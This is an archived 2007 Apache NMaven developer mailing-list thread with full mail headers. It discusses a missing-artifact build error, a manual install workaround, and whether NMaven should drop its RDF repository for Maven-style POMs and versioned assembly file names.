[INFO] [compile:initialize] >> [INFO] Mojo Execution Time = 0 >> [INFO] [resolver:resolve] >> [INFO] >> --------------------------------------------------------------------- >> --- >> [ERROR] BUILD ERROR >> [INFO] >> --------------------------------------------------------------------- >> --- >> [INFO] Failed to resolve artifact. >> >> Missing: >> ---------- >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT >> >> Try downloading the file manually from the project website. >> >> Then, install it using the command: >> mvn install:install-file -DgroupId=NMaven.Plugins -DartifactId= >> NMaven.Plugin.Resx \ >> -Dversion=0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ >> path/to/file >> >> >> ********************************************************************* >> ************************** >> >> So, I did just that, where I set /path/tofile = to: >> >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe >> >> Note that I *found* the supposedly not-found resx plugin where it was >> supposed to be. Am I missing >> something here? >> >> Anyway, that generated my nmaven-settings.xml file, and the >> following mvn >> compile worked. >> >> Hope this helps at least someone - I scratched my head for a day >> over this >> one. Oh - I also read >> the README.txt, and something in there triggered my thinking about >> forcing >> the install of the file >> that I knew I had. >> >> >> >> _____________________________________________________________________ >> _______________ >> Shape Yahoo! in your own image. Join our Network Research Panel >> today! >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 >> >> >> Thanks, Jason ---------------------------------------------------------- Jason van Zyl Founder, Apache Maven [email protected] ---------------------------------------------------------- From [email protected] Mon Oct 15 16:31:49 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39733 invoked from network); 15 Oct 2007 16:31:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 16:31:49 -0000 Received: (qmail 90871 invoked by uid 500); 15 Oct 2007 16:31:37 -0000 Delivered-To: [email protected] Received: (qmail 90858 invoked by uid 500); 15 Oct 2007 16:31:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90849 invoked by uid 99); 15 Oct 2007 16:31:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 09:31:36 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 16:31:39 +0000 Received: by nz-out-0506.google.com with SMTP id o37so960721nzf for <[email protected]>; Mon, 15 Oct 2007 09:31:19 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=ZFRFGLErfu/OenfI5E5eoHE55xzDs95dlw6OJC4z3fQ=; b=oRuwyw+atYg/Zm9ZwqiWgMWOIrSbhbcwuOFVzp9rGU0/tmAMKu4wGbNLbeot6sZFskhc6+jkKIYtJY6a5Wq/4vTOwyZ+MvtYjHhO83etMRdRkr02gCaQ4dL1UaCiQ0JXa7drRjmVgW7pXfzZvOk1myjVSrM5omdF3oT4BP1nUdc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=ASTvRIrD+jGjXwEaO8O1CiEKFneTh6TNC3QXAD0rbnV54vVb5qnNd+BGD6rmPBIJYh5Y+FpkGs0aUUnPd8PuPdT1JMdDh2o8AFpOTe9HWA1qe9VDqr62Vnf7porGVrw9yPNhl/Z10af+xOhTPm2ECEKySaHu0+aFlFobmY7SPzY= Received: by 161.129.204.104 with SMTP id n21mr2772960rvj.1192465878210; Mon, 15 Oct 2007 09:31:18 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 15 Oct 2007 09:31:18 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 15 Oct 2007 09:31:18 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: NMaven not using POMs in local repository In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_36520_107164.1192465878201" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_36520_107164.1192465878201 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Jason, We can isolate the two main issues as 1) RDF: this is there to provide tool-chain/classifier/capabilities support; 2) resolving has problems largely deriving from removing of versions from the file name. If everyone is okay pushing off the tool chain and/or capabilities support, then we can dump it. Admittedly, this is a huge part of NMaven but it does make it tougher to jump into the code and if no one needs this right now, then it's more of hindrance than anything. In regards to (2), including a version in the file name enforces a type of strong name loading. You won't be able to just swap out different versions of assemblies during runtime, but rather you'll need to recompile the whole chain of assemblies. Personally, I think we're going to need signed assemblies in the public open-source repositories, so including versions in the filename won't be a big deal. The problem with including versions in the file name would occur for things like web apps (or executables) that have private application spaces, where someone wants to just plop in a new version of their assembly and restart the application. In this case, they may need to recompile a number of assemblies (even transitive relations) that depend on that assembly. I'm also okay with including versions in the file name, as long as everyone accepts and can deal with the limitations. This would very quickly bring NMaven back in line with Maven. If we can get a discussion going and then a vote, we can move quickly to start making any changes. Regards, Shane On 10/14/07, Jason van Zyl <[email protected]> wrote: > > Hi Shane, > > Do you have any plans for switching the local repository mechanism > back to using POMs? > > I would at least like to have a flavor that works like Maven normally > does and for this to be the default. For me this is requisite for > NMaven to be integrated into the Maven project. I realize that there > are shortcomings with the artifact resolution mechanism and using RDF > might be good for exploration, but it makes NMaven too divergent from > Maven IMO, is confusing to users and really makes NMaven something > different. > > I think you're having a hard enough time getting a community going > and I don't think this fundamental difference in behavior is going to > help much in that respect. For me, the three groups I know who are > using it, use both Java and .NET and I always get asked why doesn't > NMaven use POMs like Maven? Will NMaven not currently work without > RDF? And do you really see there being value in being wholly > different with respect to local repository metadata? > > On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > > > Hi Paul, > > > > When NMaven checks for the existence of a file locally, it looks in > > the uac > > directory not the repository directory. I am wondering whether the > > meta-data > > in your RDF repo is correct. Can you try: > > > > mvn org.apache.maven.dotnet.plugins:maven-repository- > > plugin:export-rdf > > > > and post the results of the > > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll take a > > look at it as a starting point to track down the > > problem. > > > > Thanks, > > Shane > > > > > > On 9/28/07, paul anderson <[email protected]> wrote: > >> > >> Greetings. Seasoned java/regular maven user here. Now working > >> with .NET . > >> . . . . > >> > >> Building went fine - (had csc and xsd.exe on path). > >> > >> problem came when trying to actually use : mvn compile with a valid > >> pom.xml file in the directory > >> (note that I also did not have an nmaven-settings.xml file - not sure > >> why): > >> > >> got this (between * for easy parsing): > >> > >> ********************************************************************* > >> ************** > >> [INFO] Scanning for projects... > >> [INFO] > >> --------------------------------------------------------------------- > >> ------- > >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 > >> [INFO] task-segment: [compile] > >> [INFO] > >> --------------------------------------------------------------------- > >> ------- > >> [INFO] [compile:initialize] > >> [INFO] Mojo Execution Time = 0 > >> [INFO] [resolver:resolve] > >> [INFO] > >> --------------------------------------------------------------------- > >> --- > >> [ERROR] BUILD ERROR > >> [INFO] > >> --------------------------------------------------------------------- > >> --- > >> [INFO] Failed to resolve artifact. > >> > >> Missing: > >> ---------- > >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT > >> > >> Try downloading the file manually from the project website. > >> > >> Then, install it using the command: > >> mvn install:install-file -DgroupId=NMaven.Plugins -DartifactId= > >> NMaven.Plugin.Resx \ > >> -Dversion=0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ > >> path/to/file > >> > >> > >> ********************************************************************* > >> ************************** > >> > >> So, I did just that, where I set /path/tofile = to: > >> > >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins > >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe > >> > >> Note that I *found* the supposedly not-found resx plugin where it was > >> supposed to be. Am I missing > >> something here? > >> > >> Anyway, that generated my nmaven-settings.xml file, and the > >> following mvn > >> compile worked. > >> > >> Hope this helps at least someone - I scratched my head for a day > >> over this > >> one. Oh - I also read > >> the README.txt, and something in there triggered my thinking about > >> forcing > >> the install of the file > >> that I knew I had. > >> > >> > >> > >> _____________________________________________________________________ > >> _______________ > >> Shape Yahoo! in your own image. Join our Network Research Panel > >> today! > >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 > >> > >> > >> > > Thanks, > > Jason > > ---------------------------------------------------------- > Jason van Zyl > Founder, Apache Maven > [email protected] > ---------------------------------------------------------- > > > > ------=_Part_36520_107164.1192465878201-- From [email protected] Mon Oct 15 16:48:19 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49931 invoked from network); 15 Oct 2007 16:48:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 16:48:19 -0000 Received: (qmail 15043 invoked by uid 500); 15 Oct 2007 16:48:07 -0000 Delivered-To: [email protected] Received: (qmail 15022 invoked by uid 500); 15 Oct 2007 16:48:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15013 invoked by uid 99); 15 Oct 2007 16:48:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 09:48:07 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 16:48:11 +0000 Received: by wx-out-0506.google.com with SMTP id h30so1692796wxd for <[email protected]>; Mon, 15 Oct 2007 09:47:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=Ls53P/3PJ4/58ZIH0vt9FDKl1GPD+Pul5kau+Y36DA4=; b=faHmWXJNHCBeC43+4GJvA8HzFOzp7m1ARxqts3tRPoiMk4b+Ba70XsfUqyAWEUH6MclV+uXFe1VSU6IkZO6M3cF+xFmY5qnoCsIN+Nq2SKzWumfA+3eyOiEh5Issf27Q7+wbmzTStJRatlF2Zlf5ZtvZ2a7XkmP1dMvaYLkx0hw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=LRzuNUB/FRyfnFTsYCeAXALQ3avWtkAmejQnwy020jBnSEI6vFpvxdBI4sii37fZTDSbRdSlRs98fbj5J20CHCdyKIVqNdHMrRF5/v/CKYynZuka2k2nwpUuR8uRrS85PZ/ZMlCuDw+m7IzlTutNHIDNEiqPv5YrnXLwV/wFBKE= Received: by 161.129.204.104 with SMTP id d16mr8988040aga.1192466870240; Mon, 15 Oct 2007 09:47:50 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 15 Oct 2007 09:47:50 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 15 Oct 2007 09:47:50 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: NMaven not using POMs in local repository In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_43762_29369725.1192466870231" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_43762_29369725.1192466870231 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Shane, Isn't one of the underlying problems that the .net framework does not allow for versions in the file name? This is why we have utilized the AssemblyInfo in the past. Would the strategy still be to have versioned files in remote repos, but rename the latest version to be version-less in the local repository? Thanks, Evan On 10/15/07, Shane Isbell <[email protected]> wrote: > > Hi Jason, > > We can isolate the two main issues as 1) RDF: this is there to provide > tool-chain/classifier/capabilities support; 2) resolving has problems > largely deriving from removing of versions from the file name. > > If everyone is okay pushing off the tool chain and/or capabilities > support, > then we can dump it. Admittedly, this is a huge part of NMaven but it does > make it tougher to jump into the code and if no one needs this right now, > then it's more of hindrance than anything. > > In regards to (2), including a version in the file name enforces a type of > strong name loading. You won't be able to just swap out different versions > of assemblies during runtime, but rather you'll need to recompile the > whole > chain of assemblies. Personally, I think we're going to need signed > assemblies in the public open-source repositories, so including versions > in > the filename won't be a big deal. The problem with including versions in > the > file name would occur for things like web apps (or executables) that have > private application spaces, where someone wants to just plop in a new > version of their assembly and restart the application. In this case, they > may need to recompile a number of assemblies (even transitive relations) > that depend on that assembly. I'm also okay with including versions in the > file name, as long as everyone accepts and can deal with the limitations. > This would very quickly bring NMaven back in line with Maven. > > If we can get a discussion going and then a vote, we can move quickly to > start making any changes. > > Regards, > Shane > > > On 10/14/07, Jason van Zyl <[email protected]> wrote: > > > > Hi Shane, > > > > Do you have any plans for switching the local repository mechanism > > back to using POMs? > > > > I would at least like to have a flavor that works like Maven normally > > does and for this to be the default. For me this is requisite for > > NMaven to be integrated into the Maven project. I realize that there > > are shortcomings with the artifact resolution mechanism and using RDF > > might be good for exploration, but it makes NMaven too divergent from > > Maven IMO, is confusing to users and really makes NMaven something > > different. > > > > I think you're having a hard enough time getting a community going > > and I don't think this fundamental difference in behavior is going to > > help much in that respect. For me, the three groups I know who are > > using it, use both Java and .NET and I always get asked why doesn't > > NMaven use POMs like Maven? Will NMaven not currently work without > > RDF? And do you really see there being value in being wholly > > different with respect to local repository metadata? > > > > On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > > > > > Hi Paul, > > > > > > When NMaven checks for the existence of a file locally, it looks in > > > the uac > > > directory not the repository directory. I am wondering whether the > > > meta-data > > > in your RDF repo is correct. Can you try: > > > > > > mvn org.apache.maven.dotnet.plugins:maven-repository- > > > plugin:export-rdf > > > > > > and post the results of the > > > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll take a > > > look at it as a starting point to track down the > > > problem. > > > > > > Thanks, > > > Shane > > > > > > > > > On 9/28/07, paul anderson <[email protected]> wrote: > > >> > > >> Greetings. Seasoned java/regular maven user here. Now working > > >> with .NET . > > >> . . . . > > >> > > >> Building went fine - (had csc and xsd.exe on path). > > >> > > >> problem came when trying to actually use : mvn compile with a valid > > >> pom.xml file in the directory > > >> (note that I also did not have an nmaven-settings.xml file - not sure > > >> why): > > >> > > >> got this (between * for easy parsing): > > >> > > >> ********************************************************************* > > >> ************** > > >> [INFO] Scanning for projects... > > >> [INFO] > > >> --------------------------------------------------------------------- > > >> ------- > > >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 > > >> [INFO] task-segment: [compile] > > >> [INFO] > > >> --------------------------------------------------------------------- > > >> ------- > > >> [INFO] [compile:initialize] > > >> [INFO] Mojo Execution Time = 0 > > >> [INFO] [resolver:resolve] > > >> [INFO] > > >> --------------------------------------------------------------------- > > >> --- > > >> [ERROR] BUILD ERROR > > >> [INFO] > > >> --------------------------------------------------------------------- > > >> --- > > >> [INFO] Failed to resolve artifact. > > >> > > >> Missing: > > >> ---------- > > >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT > > >> > > >> Try downloading the file manually from the project website. > > >> > > >> Then, install it using the command: > > >> mvn install:install-file -DgroupId=NMaven.Plugins -DartifactId= > > >> NMaven.Plugin.Resx \ > > >> -Dversion=0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ > > >> path/to/file > > >> > > >> > > >> ********************************************************************* > > >> ************************** > > >> > > >> So, I did just that, where I set /path/tofile = to: > > >> > > >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins > > >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe > > >> > > >> Note that I *found* the supposedly not-found resx plugin where it was > > >> supposed to be. Am I missing > > >> something here? > > >> > > >> Anyway, that generated my nmaven-settings.xml file, and the > > >> following mvn > > >> compile worked. > > >> > > >> Hope this helps at least someone - I scratched my head for a day > > >> over this > > >> one. Oh - I also read > > >> the README.txt, and something in there triggered my thinking about > > >> forcing > > >> the install of the file > > >> that I knew I had. > > >> > > >> > > >> > > >> _____________________________________________________________________ > > >> _______________ > > >> Shape Yahoo! in your own image. Join our Network Research Panel > > >> today! > > >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 > > >> > > >> > > >> > > > > Thanks, > > > > Jason > > > > ---------------------------------------------------------- > > Jason van Zyl > > Founder, Apache Maven > > [email protected] > > ---------------------------------------------------------- > > > > > > > > > ------=_Part_43762_29369725.1192466870231-- From [email protected] Mon Oct 15 17:07:35 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61810 invoked from network); 15 Oct 2007 17:07:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 17:07:33 -0000 Received: (qmail 41414 invoked by uid 500); 15 Oct 2007 17:07:21 -0000 Delivered-To: [email protected] Received: (qmail 41394 invoked by uid 500); 15 Oct 2007 17:07:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41385 invoked by uid 99); 15 Oct 2007 17:07:21 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 10:07:21 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 17:07:21 +0000 Received: by nz-out-0506.google.com with SMTP id o37so971327nzf for <[email protected]>; Mon, 15 Oct 2007 10:07:00 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=p5PwTs/X0vhnaKNm2YK4tcfO3xfz5DOEvSerzgVTAYw=; b=AdCKkrrgp+QRvYHXANs8mcbxLiPLMSz87RVWLD7GU8qyFzT4AnW8IGNUshDZu3iFmf0qoCl1KKtQlDz7jNnXf+ogJEJqB45/BilPaUzIOfzBrV1SbppmWPUaMZAeglvoheX2yxM5xxU+/ay2yfCBz3qEahVQjwH87xo9d1Lf1S0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=j90Rpm4OTBtE60vgVKcsk5bGoKNr+Dw8rgN/uw/3ZtyuiDZRd/781w0ONwAJHXtYcr6EXXJGp9algjzQWp1YMDC+AdrXbwemLQi+EZIZ0MomOrO12tDndbOfiGpHinKXo2p18dPb4ezI2GRXZYLHZTqjd/DlF7QTgB8+Usm1c9E= Received: by 161.129.204.104 with SMTP id t12mr2790259rvj.1192468019716; Mon, 15 Oct 2007 10:06:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 15 Oct 2007 10:06:59 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 15 Oct 2007 10:06:59 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: NMaven not using POMs in local repository In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_36642_11576341.1192468019709" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_36642_11576341.1192468019709 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Evan, You can use versions in the file name, it's just that it changes the way the assembly is loaded. See http://www.jroller.com/random7/entry/apache_nmaven_repository_structure_and http://docs.codehaus.org/display/MAVENUSER/BEA+Maven+Requirement+Documents for some explanation. If you recall, we went down the path of versioning in the remote repos and not versioning in the local repo (look at the blog entry above for a more detailed explanation). It was all of these problems which led me to rewrite the resolver and split the repository. From my perspective, I'm not too keen on the "copy the assembly approach", not because I don't think we can't make it work, but because I think that it gets way too complicated. Remember, we also need to support at least a single classifier, attached artifacts and snapshots, so it promises to get more complicated with all the renaming and overlapping repos. Regards, Shane On 10/15/07, Evan Worley <[email protected]> wrote: > > Hi Shane, > > Isn't one of the underlying problems that the .net framework does not > allow > for versions in the file name? This is why we have utilized the > AssemblyInfo in the past. Would the strategy still be to have versioned > files in remote repos, but rename the latest version to be version-less in > the local repository? > > Thanks, > Evan > > On 10/15/07, Shane Isbell <[email protected]> wrote: > > > > Hi Jason, > > > > We can isolate the two main issues as 1) RDF: this is there to provide > > tool-chain/classifier/capabilities support; 2) resolving has problems > > largely deriving from removing of versions from the file name. > > > > If everyone is okay pushing off the tool chain and/or capabilities > > support, > > then we can dump it. Admittedly, this is a huge part of NMaven but it > does > > make it tougher to jump into the code and if no one needs this right > now, > > then it's more of hindrance than anything. > > > > In regards to (2), including a version in the file name enforces a type > of > > strong name loading. You won't be able to just swap out different > versions > > of assemblies during runtime, but rather you'll need to recompile the > > whole > > chain of assemblies. Personally, I think we're going to need signed > > assemblies in the public open-source repositories, so including versions > > in > > the filename won't be a big deal. The problem with including versions in > > the > > file name would occur for things like web apps (or executables) that > have > > private application spaces, where someone wants to just plop in a new > > version of their assembly and restart the application. In this case, > they > > may need to recompile a number of assemblies (even transitive relations) > > that depend on that assembly. I'm also okay with including versions in > the > > file name, as long as everyone accepts and can deal with the > limitations. > > This would very quickly bring NMaven back in line with Maven. > > > > If we can get a discussion going and then a vote, we can move quickly to > > start making any changes. > > > > Regards, > > Shane > > > > > > On 10/14/07, Jason van Zyl <[email protected]> wrote: > > > > > > Hi Shane, > > > > > > Do you have any plans for switching the local repository mechanism > > > back to using POMs? > > > > > > I would at least like to have a flavor that works like Maven normally > > > does and for this to be the default. For me this is requisite for > > > NMaven to be integrated into the Maven project. I realize that there > > > are shortcomings with the artifact resolution mechanism and using RDF > > > might be good for exploration, but it makes NMaven too divergent from > > > Maven IMO, is confusing to users and really makes NMaven something > > > different. > > > > > > I think you're having a hard enough time getting a community going > > > and I don't think this fundamental difference in behavior is going to > > > help much in that respect. For me, the three groups I know who are > > > using it, use both Java and .NET and I always get asked why doesn't > > > NMaven use POMs like Maven? Will NMaven not currently work without > > > RDF? And do you really see there being value in being wholly > > > different with respect to local repository metadata? > > > > > > On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > > > > > > > Hi Paul, > > > > > > > > When NMaven checks for the existence of a file locally, it looks in > > > > the uac > > > > directory not the repository directory. I am wondering whether the > > > > meta-data > > > > in your RDF repo is correct. Can you try: > > > > > > > > mvn org.apache.maven.dotnet.plugins:maven-repository- > > > > plugin:export-rdf > > > > > > > > and post the results of the > > > > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll take > a > > > > look at it as a starting point to track down the > > > > problem. > > > > > > > > Thanks, > > > > Shane > > > > > > > > > > > > On 9/28/07, paul anderson <[email protected]> wrote: > > > >> > > > >> Greetings. Seasoned java/regular maven user here. Now working > > > >> with .NET . > > > >> . . . . > > > >> > > > >> Building went fine - (had csc and xsd.exe on path). > > > >> > > > >> problem came when trying to actually use : mvn compile with a valid > > > >> pom.xml file in the directory > > > >> (note that I also did not have an nmaven-settings.xml file - not > sure > > > >> why): > > > >> > > > >> got this (between * for easy parsing): > > > >> > > > >> > ********************************************************************* > > > >> ************** > > > >> [INFO] Scanning for projects... > > > >> [INFO] > > > >> > --------------------------------------------------------------------- > > > >> ------- > > > >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 > > > >> [INFO] task-segment: [compile] > > > >> [INFO] > > > >> > --------------------------------------------------------------------- > > > >> ------- > > > >> [INFO] [compile:initialize] > > > >> [INFO] Mojo Execution Time = 0 > > > >> [INFO] [resolver:resolve] > > > >> [INFO] > > > >> > --------------------------------------------------------------------- > > > >> --- > > > >> [ERROR] BUILD ERROR > > > >> [INFO] > > > >> > --------------------------------------------------------------------- > > > >> --- > > > >> [INFO] Failed to resolve artifact. > > > >> > > > >> Missing: > > > >> ---------- > > > >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT > > > >> > > > >> Try downloading the file manually from the project website. > > > >> > > > >> Then, install it using the command: > > > >> mvn install:install-file -DgroupId=NMaven.Plugins-DartifactId= > > > >> NMaven.Plugin.Resx \ > > > >> -Dversion=0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ > > > >> path/to/file > > > >> > > > >> > > > >> > ********************************************************************* > > > >> ************************** > > > >> > > > >> So, I did just that, where I set /path/tofile = to: > > > >> > > > >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins > > > >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe > > > >> > > > >> Note that I *found* the supposedly not-found resx plugin where it > was > > > >> supposed to be. Am I missing > > > >> something here? > > > >> > > > >> Anyway, that generated my nmaven-settings.xml file, and the > > > >> following mvn > > > >> compile worked. > > > >> > > > >> Hope this helps at least someone - I scratched my head for a day > > > >> over this > > > >> one. Oh - I also read > > > >> the README.txt, and something in there triggered my thinking about > > > >> forcing > > > >> the install of the file > > > >> that I knew I had. > > > >> > > > >> > > > >> > > > >> > _____________________________________________________________________ > > > >> _______________ > > > >> Shape Yahoo! in your own image. Join our Network Research Panel > > > >> today! > > > >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 > > > >> > > > >> > > > >> > > > > > > Thanks, > > > > > > Jason > > > > > > ---------------------------------------------------------- > > > Jason van Zyl > > > Founder, Apache Maven > > > [email protected] > > > ---------------------------------------------------------- > > > > > > > > > > > > > > > ------=_Part_36642_11576341.1192468019709-- From [email protected] Mon Oct 15 17:28:31 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94326 invoked from network); 15 Oct 2007 17:28:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 17:28:31 -0000 Received: (qmail 77293 invoked by uid 500); 15 Oct 2007 17:28:18 -0000 Delivered-To: [email protected] Received: (qmail 77268 invoked by uid 500); 15 Oct 2007 17:28:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77259 invoked by uid 99); 15 Oct 2007 17:28:18 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 10:28:18 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 17:28:20 +0000 Received: by nz-out-0506.google.com with SMTP id o37so977366nzf for <[email protected]>; Mon, 15 Oct 2007 10:27:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=2vcf+VCeghQkXZjp6mJTUFCWFdO7gxqnNIES1/xtdSs=; b=q8g/c6u0U8XpzTpTqFu7Qbl7XCyiNE7kw4EF4zYkCvFEa0Pn/F2ZF3sCHpG4GSLMrithVcWgHG+3DnqLp5sXM7rQZAjJimQHTquK1QDFGxNvoKvRfCnIyeH80kgtJD+fMnjrRqJFqQC236ngSl+LzDvd6vKndLeU/ksREeg6YA8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; 